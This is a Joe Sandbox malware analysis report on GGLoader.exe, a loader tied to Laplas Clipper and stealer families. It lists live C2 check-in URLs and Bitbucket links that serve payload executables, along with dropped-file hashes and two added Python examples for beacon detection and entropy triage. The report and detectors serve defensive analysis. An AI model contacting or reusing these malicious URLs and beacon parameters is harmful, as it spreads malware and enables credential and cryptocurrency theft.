https://oneget.orgX | 0% | URL Reputation | safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://aka.ms/winsvr-2022-pshelp | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bitbucket.org | 185.166.143.49 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://45.159.189.105/bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e | true | | unknown
https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe | true | | unknown
http://45.159.189.105/bot/regex | true | | unknown
https://bitbucket.org/5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe | true | | unknown
https://bitbucket.org/recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
45.159.189.105 | unknown | Netherlands | 14576 | HOSTING-SOLUTIONS (US) | true
185.166.143.49 | bitbucket.org | Germany | 16509 | AMAZON-02 (US) | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1526110
Start date and time: 2024-10-04 19:12:17 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 15
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: GGLoader.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.mine.winEXE@64/89@1/2
EGA Information:
• Successful, ratio: 71.4%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 140
• Number of non-executed functions: 214
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.190.159.64, 20.190.159.75, 40.126.31.73, 40.126.31.69, 20.190.159.0, 40.126.31.71, 20.190.159.73, 40.126.31.67
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, dns.msftncsi.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target powershell.exe, PID 3760 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7520 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7684 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8068 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: GGLoader.exe
Time | Type | Description
13:13:13 | API Interceptor | 158x Sleep call for process: powershell.exe modified
13:13:22 | API Interceptor | 1x Sleep call for process: LicCheck.exe modified
13:13:55 | API Interceptor | 456x Sleep call for process: svcupdater.exe modified
13:14:36 | API Interceptor | 38135x Sleep call for process: lsass.exe modified
13:14:36 | API Interceptor | 933x Sleep call for process: dllhost.exe modified
13:14:36 | API Interceptor | 57756x Sleep call for process: winlogon.exe modified
13:14:37 | API Interceptor | 5236x Sleep call for process: svchost.exe modified
13:14:40 | API Interceptor | 28810x Sleep call for process: dwm.exe modified
18:13:41 | Task Scheduler | Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe
18:13:51 | Task Scheduler | Run new task: svcupdater path: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
45.159.189.105 | Mega.nz Spreader.exe | malicious | Laplas Clipper, Meduza Stealer | 45.159.189.105/bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d
45.159.189.105 | 9RDOrudEBB.exe | malicious | Laplas Clipper | 45.159.189.105/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=computer\user
45.159.189.105 | file.exe | malicious | Laplas Clipper, RedLine | 45.159.189.105/bot/online?key=ab77c1513d42148558312d676282a204d8aa055051d315af2056241c7f79c6f4&guid=computer\user
45.159.189.105 | SXm1px9Zg0.exe | malicious | Laplas Clipper | 45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=computer\user
45.159.189.105 | 4x8vn385io.exe | malicious | MinerDownloader, Laplas Clipper, RedLine, Xmrig | 45.159.189.105/bot/online?key=ab77c1513d42148558312d676282a204d8aa055051d315af2056241c7f79c6f4&guid=computer\user
45.159.189.105 | iJ6SIwcNf3.exe | malicious | Laplas Clipper | 45.159.189.105/bot/online?key=7ee57b1f6d4aff08f9755119b18cf0754b677addcb6a3063066112b10a357a8e&guid=computer\user
45.159.189.105 | YRcS5GIB02.exe | malicious | Laplas Clipper | 45.159.189.105/bot/online?key=ab77c1513d42148558312d676282a204d8aa055051d315af2056241c7f79c6f4&guid=computer\user
45.159.189.105 | F2u0un5xar.exe | malicious | Laplas Clipper | 45.159.189.105/bot/online?key=0be23a6bec914a7d28f1aae995f036fdba93224093ddb48d02fe43e814862f4e&guid=computer\user
45.159.189.105 | rGn7jtGZE0.exe | malicious | Laplas Clipper | 45.159.189.105/bot/online?guid=992547&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34
45.159.189.105 | 1DtMIGzTkc.exe | malicious | Laplas Clipper | 45.159.189.105/bot/online?guid=980108&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34
185.166.143.49 | http://jasonj002.bitbucket.io/ | malicious | HTMLPhisher | jasonj002.bitbucket.io/
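The context rows above show the same Laplas Clipper check-in shape across many unrelated samples (/bot/online?key=<64 hex>&guid=..., /bot/regex?key=<64 hex>), sometimes with the parameters in a different order, while the host behind it is a single IP that can change at any time. The Python below is an added example, not part of the Joe Sandbox report and not the malware's own code: it pulls that URL shape out of web-proxy log lines and distinguishes a hit on the IP seen in this report from a hit on the path pattern alone, which is the more durable signal. The log line format, the log lines and every function name are constructed here; the key values reused in the sample lines are copied from the rows above.

```python
"""Flag Laplas Clipper bot check-ins in web-proxy logs.

Added example, not from the Joe Sandbox report or the malware. The endpoint and
parameter shapes are taken from the report's context rows; the log format, log
lines and function names are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints observed in the report's context rows.
LAPLAS_ENDPOINTS = {"/bot/online", "/bot/regex"}
# Every 'key' in the report is 64 lowercase hex characters.
HEX64 = re.compile(r"^[0-9a-f]{64}$")
# IP seen in this report. Weak evidence on its own: C2 infrastructure rotates.
KNOWN_C2_IPS = {"45.159.189.105"}


def parse_laplas_beacon(url):
    """Return {'host','endpoint','key','guid'} when url has the Laplas check-in
    shape, else None. Parameter order is not fixed (the report shows both
    key-first and guid-first rows), so the query is parsed, not regex-matched."""
    if "://" not in url:
        url = "http://" + url  # proxy logs often omit the scheme
    parts = urlsplit(url)
    if parts.path not in LAPLAS_ENDPOINTS:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    key = qs.get("key", [""])[0]
    if not HEX64.match(key):
        return None
    guid = qs.get("guid", [None])[0]
    # /bot/online always carried a guid in the report; /bot/regex did not.
    if parts.path == "/bot/online" and guid is None:
        return None
    return {"host": parts.hostname, "endpoint": parts.path, "key": key, "guid": guid}


def scan_proxy_log(lines):
    """Return [(line_no, verdict, beacon)] for lines whose URL matches.

    Assumed (constructed) line format: '<ts> <client_ip> <method> <url> <status>'.
    verdict is 'known_c2' when the host is in KNOWN_C2_IPS, else 'pattern_match'."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 5:
            continue
        beacon = parse_laplas_beacon(fields[3])
        if beacon is None:
            continue
        verdict = "known_c2" if beacon["host"] in KNOWN_C2_IPS else "pattern_match"
        hits.append((n, verdict, beacon))
    return hits


# Constructed sample log (not from the report): two beacons, one decoy, one benign.
SAMPLE_LOG = [
    "2024-10-04T17:13:55Z 10.0.0.7 GET http://45.159.189.105/bot/online?key=ab77c1513d42148558312d676282a204d8aa055051d315af2056241c7f79c6f4&guid=computer\\user 200",
    "2024-10-04T17:14:02Z 10.0.0.7 GET http://198.51.100.20/bot/online?guid=992547&key=afc950a4a18fd71c9d7be4c460e4cb77d0bcf29a49d097e4e739c17c332c3a34 200",
    "2024-10-04T17:14:10Z 10.0.0.9 GET http://example.com/bot/online?key=notahash&guid=1 404",
    "2024-10-04T17:14:11Z 10.0.0.9 GET https://aka.ms/pscore68 200",
]

if __name__ == "__main__":
    for n, verdict, b in scan_proxy_log(SAMPLE_LOG):
        print(f"line {n}: {verdict} host={b['host']} endpoint={b['endpoint']} guid={b['guid']}")
```

The second sample line deliberately uses a different host: it still matches, because the path and the 64-hex key are what the family keeps constant, while the IP is only what this one analysis happened to see.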
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bitbucket.org | file.exe | malicious | Unknown | 185.166.143.48
bitbucket.org | sostener.vbs | malicious | Njrat | 185.166.143.50
bitbucket.org | sostener.vbs | malicious | XWorm | 185.166.143.50
bitbucket.org | 0XVZC3kfwL.exe | malicious | Unknown | 185.166.143.49
bitbucket.org | nTHivMbGpg.exe | malicious | Unknown | 185.166.143.50
bitbucket.org | sRMytgfRpJ.exe | malicious | RedLine | 185.166.143.49
bitbucket.org | envifa.vbs | malicious | Unknown | 185.166.143.48
bitbucket.org | sostener.vbs | malicious | Njrat | 185.166.143.50
bitbucket.org | S0FTWARE.exe | malicious | Go Injector, Vidar, Xmrig | 185.166.143.50
bitbucket.org | SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe | malicious | Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer | 185.166.143.48
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HOSTING-SOLUTIONS (US) | test_loading.exe | malicious | Meterpreter | 162.248.224.223
HOSTING-SOLUTIONS (US) | 3plugin29563.exe | malicious | Amadey | 185.209.162.226
HOSTING-SOLUTIONS (US) | ExeFile (200).exe | malicious | Unknown | 185.130.105.44
HOSTING-SOLUTIONS (US) | ExeFile (200).exe | malicious | Unknown | 185.130.105.44
HOSTING-SOLUTIONS (US) | Mega.nz Spreader.exe | malicious | Laplas Clipper, Meduza Stealer | 45.159.189.105
HOSTING-SOLUTIONS (US) | file.exe | malicious | Amadey | 185.209.162.226
HOSTING-SOLUTIONS (US) | http://tqwwwcom.ru/ | malicious | Unknown | 204.155.30.34
HOSTING-SOLUTIONS (US) | xworm.exe | malicious | Unknown | 185.209.160.70
HOSTING-SOLUTIONS (US) | Fb9Ff8L4T7 | malicious | RHADAMANTHYS | 185.209.160.99
HOSTING-SOLUTIONS (US) | file.exe | malicious | Vidar, Xmrig | 185.209.162.208
AMAZON-02 (US) | https://s3.amazonaws.com/r3e1272/Rco.html#4eyOul3510eTKK19nejdimaazo189TBUDIERNFIMTFBQ264510CRSG907S11 | malicious | Phisher | 54.231.172.248
AMAZON-02 (US) | http://nirothniroth.site/?p=22&fbclid=IwY2xjawFs_DdleHRuA2FlbQIxMQABHTdgZU6ok722L5RxKPR-zh7Gkm6BqZ8BcT950y1bxf6l0LKz0zslg7KJHw_aem__ldVm1UUndXAkwYRakjBzg | malicious | Unknown | 52.213.102.87
AMAZON-02 (US) | https://www.fukui-tv.co.jp/_click.php?id=83642&url=https://brewingrecovery.com/carrierzone.html#acctg@azteccontainer.com | malicious | HTMLPhisher | 3.160.150.28
AMAZON-02 (US) | https://rs-stripe.hometalk.com/branding/?utm_source=contentstripe&amp | malicious | Unknown | 3.134.193.124
AMAZON-02 (US) | http://bloxsales.com/ | malicious | Unknown | 18.202.131.124
AMAZON-02 (US) | https://lil-loveeeees.blogspot.com/ | malicious | Unknown | 54.76.113.237
AMAZON-02 (US) | ethaertharety.ps1 | malicious | Unknown | 13.33.187.32
AMAZON-02 (US) | file.exe | malicious | Unknown | 52.217.166.121
AMAZON-02 (US) | TsxJNxhxMJfQTd.ps1 | malicious | Unknown | 52.222.214.77
AMAZON-02 (US) | https://smallpdf.com/sign-pdf/document#data=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.[...].OqxYiO2DP6wYmX2t6u3X4Qa-FIZ5J__ELTV29qKimLo&eid=2461416d-babf-4309-94ac-aebdc4c2ffcc&esrt=7cfbf3c6-dbae-4056-af61-e159684e1e78 | malicious | HTMLPhisher | 18.245.46.32
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Credential Flusher | 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | https://m0rrisvo.za.com/Qm4nK/ | malicious | HTMLPhisher | 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | https://admin.hotcoinbase.com/ | malicious | Unknown | 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | https://rb.gy/a8jf8c | malicious | Unknown | 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | Payout Receipt.pptx | malicious | HTMLPhisher | 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | QUOTATIONS#08673.exe | malicious | AgentTesla | 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | rTCTdVVTSwCdqkFxlFIpU.ps1 | malicious | Unknown | 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | WqZxLxZrOrnMWYaBaBKdLenVTu.ps1 | malicious | Unknown | 185.166.143.49
                                                                                                  No context
Process: C:\Users\user\AppData\Local\Temp\LicSend.exe
File Type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 2330112
Entropy (8bit): 7.950671995498444
Encrypted: false
SSDEEP: 49152:6obTXVXd5mAtLE64iNz971+2JAZ65NypM+++zTlu+rwThD:fbTltZa67z3+2JU6fyW7ck+gD
MD5: 4648D5EF582C7B17D9712F5B5B60F046
SHA1: 249BAC0094F6AEC1C4BB36F704DDCA1C708401A7
SHA-256: 0DBED06724205E7995F45B769454C3EBFD832F633471729EEBCE756CB90FC348
SHA-512: 04839048B38A1BCFF4254C77F479475C0B2E30E2D2BE5FAE65F23274107064A3D0ABB3CA8D1693A1809DB4DB9DFBE7A2681C169EBE536FEFB0CB01330D118F6F
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 79%
                                                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d....s.c...............&......#................@..............................$.....L.$...`... ...............................................#.,.....#.......#...............#.............................@j#.(...................T.#..............................text...............................`..`.data... L"......N".................@....rdata.......`#......F#.............@..@.pdata........#......\#.............@..@.xdata........#......l#.............@..@.bss....8.....#..........................idata..,.....#......z#.............@....CRT....h.....#.......#.............@....tls..........#.......#.............@....rsrc.........#.......#.............@....reloc........#.......#.............@..B........................................................................................................................................................................
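The record above describes a 2.3 MB PE with an 8-bit entropy of 7.95, close to the 8.0 ceiling, which is what a packed, compressed or encrypted payload looks like before unpacking; note that the report's own Encrypted flag is false for the same file, so entropy is a prompt for further work rather than a verdict. The Python below is an added example, not part of the Joe Sandbox report: it computes the same "Entropy (8bit)" figure, then windows it so a plaintext PE header can be told apart from the high-entropy region, which the whole-file number alone does not show. The sample buffers are constructed in code (not the dropped file), and the 7.2 threshold is an assumption chosen for illustration.

```python
"""Entropy triage for dropped files, reproducing the 'Entropy (8bit)' metric.

Added example, not part of the Joe Sandbox report. The sample buffers are
constructed here (a zero-padded PE header followed by pseudo-random bytes), not
taken from the dropped files; the 7.2 threshold is an assumed illustration value.
"""
import hashlib
import math
from collections import Counter


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for a
    perfectly uniform byte distribution. This is the 'Entropy (8bit)' figure."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = 1024, threshold: float = 7.2):
    """Return (offset, entropy) for each fixed-size window at or above threshold.

    A whole-file figure like 7.95 hides where the entropy lives; windowing
    separates a plaintext PE header from a packed or encrypted payload region."""
    hits = []
    for off in range(0, len(data), window):
        e = shannon_entropy_8bit(data[off:off + window])
        if e >= threshold:
            hits.append((off, round(e, 3)))
    return hits


def triage(data: bytes, threshold: float = 7.2) -> str:
    """Coarse verdict combining the PE magic with the whole-file entropy."""
    is_pe = data[:2] == b"MZ"
    e = shannon_entropy_8bit(data)
    if is_pe and e >= threshold:
        return "PE, high entropy: likely packed/encrypted payload, unpack before static analysis"
    if e >= threshold:
        return "non-PE, high entropy: compressed or encrypted blob"
    return "low entropy: plaintext or sparse data"


def pseudo_random_bytes(n: int, seed: bytes = b"demo") -> bytes:
    """Deterministic high-entropy filler (SHA-256 in counter mode) so the example
    runs offline and reproducibly. Constructed data, not a real payload."""
    out = bytearray()
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:n])


# Constructed samples: MZ magic plus a zero-padded 1 KiB header, then an 8 KiB
# "packed" region; and a plaintext CSV-like buffer for comparison.
SAMPLE_PACKED_PE = b"MZ" + b"\x00" * 1022 + pseudo_random_bytes(8192)
SAMPLE_PLAINTEXT = b'1,"fusion","GAC",0\r\n' * 40

if __name__ == "__main__":
    for name, buf in (("packed_pe", SAMPLE_PACKED_PE), ("csv", SAMPLE_PLAINTEXT)):
        print(name, round(shannon_entropy_8bit(buf), 3), "->", triage(buf))
        print("  high-entropy windows:", high_entropy_windows(buf))
```

For the constructed PE the first 1 KiB window scores near zero and every later window scores near 8, which is the profile to expect from a small stub in front of an encrypted body; a file that is uniformly high-entropy from offset zero is more likely a compressed archive or ciphertext than a PE at all.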
Process: C:\Users\user\Desktop\GGLoader.exe
File Type: CSV text
Category: dropped
Size (bytes): 443
Entropy (8bit): 5.347274615985407
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZav:ML9E4KQMsXE4Npv
MD5: F73EF0CF34F9748349B7DC26D23369A1
SHA1: 9F1AA6A1896EE82B13E910AFF27CB179ECAA77B5
SHA-256: 6B8272C1059743AA45FBEB2E303FEFB6F591D3D374FB78252432881E38E21EFD
SHA-512: C848DEE56D1BB8ABED56C0424879344F852BFA5147D529183A66C98BC303C225DCF5D7ADCF6B25B4946D0ED14023E0B5DB7D2A2C2789727949478DE64A4BAA13
Malicious: true
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):293888
                                                                                                  Entropy (8bit):6.586530975541652
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:W3UjDH1REzuiKXibpArGeNov4VFj5AOUecInYb:W3GbEmXibpn0y2E
                                                                                                  MD5:726A5B76F4C40551741FFDDA14088CE3
                                                                                                  SHA1:DF94D2F5475E8550B8D8F5DE6937F896BF0EA6B8
                                                                                                  SHA-256:69487840ADD22F155734E6E522E5E1437814CACCC14E137E0A9A602B790A4CB9
                                                                                                  SHA-512:477CE8E7B4DFDF288BCE73BF3F30CE8A94C53617903EB5B5B9B4BB61795E56ED4CD908100F88FAB76FF67FB7DF6C94280BE50576E672FCAC27589117E1C7CE06
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Q...Q...Q.....\...........G.......@.......G.............Z...Q...&.......T...../.P.......P...RichQ...........................PE..L...Ru.c...............".<...H.......S.......P....@.......................................@..................................E..x....p...........................%.. ...8...........................`...@............P...............................text....:.......<.................. ..`.rdata.......P.......@..............@..@.data........P.......@..............@....rsrc........p.......T..............@..@.reloc...%.......&...V..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2330112
                                                                                                  Entropy (8bit):7.950671995498444
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:6obTXVXd5mAtLE64iNz971+2JAZ65NypM+++zTlu+rwThD:fbTltZa67z3+2JU6fyW7ck+gD
                                                                                                  MD5:4648D5EF582C7B17D9712F5B5B60F046
                                                                                                  SHA1:249BAC0094F6AEC1C4BB36F704DDCA1C708401A7
                                                                                                  SHA-256:0DBED06724205E7995F45B769454C3EBFD832F633471729EEBCE756CB90FC348
                                                                                                  SHA-512:04839048B38A1BCFF4254C77F479475C0B2E30E2D2BE5FAE65F23274107064A3D0ABB3CA8D1693A1809DB4DB9DFBE7A2681C169EBE536FEFB0CB01330D118F6F
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d....s.c...............&......#................@..............................$.....L.$...`... ...............................................#.,.....#.......#...............#.............................@j#.(...................T.#..............................text...............................`..`.data... L"......N".................@....rdata.......`#......F#.............@..@.pdata........#......\#.............@..@.xdata........#......l#.............@..@.bss....8.....#..........................idata..,.....#......z#.............@....CRT....h.....#.......#.............@....tls..........#.......#.............@....rsrc.........#.......#.............@....reloc........#.......#.............@..B........................................................................................................................................................................
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):182535
                                                                                                  Entropy (8bit):6.5599935407193355
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:UC1N4m020gm8xh060IdTzJuAldWNUIkPSQcKSxLPScCYbWqS9uN/dOU+0L:UC1N40Fnr0602TzhldWqIk6jKSxPMkPJ
                                                                                                  MD5:4F12E73FBABB2F0AA24437D5B6F7D6A6
                                                                                                  SHA1:F8E77330E5CEB9E3027FFEDF64B077A365AA616F
                                                                                                  SHA-256:0F8022CA77BAABC7F97BD7E50A14AF5F64717384026906D144BD47152AA0FFF6
                                                                                                  SHA-512:088D6E975021FFA3A8FC3A46CD55720EF7E2BF8B98B0A3E717F61574009D0642A2A50C332CF152B3AAC012497BA8D608FC582AEF6EB8EEC5EF9D62FA106E352A
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........I..DI..DI..D...DH..D...D]..D...D...D..DD..DI..D!..D...DH..DI..DH..DRichI..D........PE..L....R.c............................XF............@..........................@..............................................`................................ .. .......................................................t............................text...j........................... ..`.rdata...5.......@..................@..@.data....4.......0..................@....reloc.. .... ... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
